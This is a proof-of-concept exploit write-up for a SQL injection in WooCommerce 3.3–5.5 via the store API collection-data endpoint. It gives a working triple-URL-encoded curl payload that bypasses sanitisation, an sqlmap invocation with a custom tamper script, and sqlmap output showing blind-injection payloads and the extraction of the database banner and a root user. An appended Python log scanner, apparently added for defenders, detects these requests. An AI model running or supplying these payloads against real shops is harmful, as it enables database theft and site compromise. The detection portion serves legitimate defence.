Proof of Concept exploit for WooCommerce 3.3-5.5 SQL Injection with SQLmap tamper

WooCommerce 3.3 through 5.5 are vulnerable to SQL injection due to lack of parameter sanitization.

Endpoint Affected: /wp-json/wc/store/products/collection-data
Parameter: calculate_attribute_counts[][taxonomy]=INJECTION&calculate_attribute_counts[][query_type]=and

Basic Sleep Proof of Concept:
poc") OR SLEEP(1)#

The payload must be triple URL-encoded to get past the "wc_sanitize_taxonomy_name" function.

time curl -sik 'https://EXAMPLE.TLD/wp-json/wc/store/products/collection-data?calculate_attribute_counts\[\]\[query_type\]=and&calculate_attribute_counts\[\]\[taxonomy\]=poc%252522%252529%252520OR%252520SLEEP%2525281%252529%252523'

In order to automate this exploit using SQLmap, one needs to create a tamper script to be able to pre-parse and triple URL encode the payload.

# python -c woo.conf --level 5 --risk 3 --tamper=tripleencode

[*] starting @ 00:10:22 /2021-07-16/

[00:10:22] [INFO] loading tamper module 'tripleencode'
[00:10:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: calculate_attribute_counts[][taxonomy] (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: calculate_attribute_counts[][taxonomy]=-3883") OR 8761=8761#&calculate_attribute_counts[][query_type]=and

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: calculate_attribute_counts[][taxonomy]=test") AND (SELECT 4628 FROM (SELECT(SLEEP(5)))lshD) AND ("IqjC"="IqjC&calculate_attribute_counts[][query_type]=and
[00:10:24] [INFO] the back-end DBMS is MySQL
[00:10:24] [INFO] fetching banner
[00:10:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:10:24] [INFO] retrieved: 5.7.33-0ubuntu0.16.04.1
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.33-0ubuntu0.16.04.1'
[00:10:42] [INFO] fetching current user
[00:10:42] [INFO] retrieved: root@%
current user: 'root@%'
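
For defenders, the request shape above is easy to spot in web server logs. The following is an added detection example, not part of the original write-up: it flags requests to the affected endpoint whose taxonomy value needs more than one URL-decoding pass or decodes to anything other than a slug. The slug character set, the access-log layout and the two sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

ENDPOINT = "/wp-json/wc/store/products/collection-data"
PARAM = re.compile(r"calculate_attribute_counts\[[^\]]*\]\[taxonomy\]")
SLUG = re.compile(r"[A-Za-z0-9_-]*")  # assumption: valid taxonomy names are slugs
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MAX_LAYERS = 5  # stop decoding after this many passes

def decode_fully(value):
    """Percent-decode until the value stops changing; return (text, layers)."""
    layers = 0
    while layers < MAX_LAYERS and (decoded := unquote(value)) != value:
        value, layers = decoded, layers + 1
    return value, layers

def inspect_request(target):
    """Return [(decoded_value, reasons)] for suspicious taxonomy parameters."""
    parts = urlsplit(target)
    if not unquote(parts.path).rstrip("/").endswith(ENDPOINT):
        return []
    findings = []
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if PARAM.fullmatch(decode_fully(name)[0]):
            value, layers = decode_fully(raw.replace("+", " "))
            reasons = [f"{layers} layers of URL encoding"] if layers > 1 else []
            if not SLUG.fullmatch(value):
                reasons.append("non-slug characters")
            if reasons:
                findings.append((value, reasons))
    return findings

def scan(lines):
    """Return [(client_ip, decoded_value, reasons)] for access-log lines."""
    hits = []
    for line in lines:
        if match := REQUEST.search(line):
            hits += [(line.split()[0], v, r) for v, r in inspect_request(match.group(1))]
    return hits

_Q = "calculate_attribute_counts[][query_type]=and&calculate_attribute_counts[][taxonomy]="
_LINE = '{} - - [16/Jul/2021:00:10:22 +0000] "GET ' + ENDPOINT + '?{} HTTP/1.1" 200 98'
SAMPLE_LOG = [  # constructed log lines using documentation IP ranges
    _LINE.format("198.51.100.7", _Q + "pa_color"),
    _LINE.format("203.0.113.9", _Q + "poc%252522%252529%252520OR%252520SLEEP%2525281%252529%252523"),
]
if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```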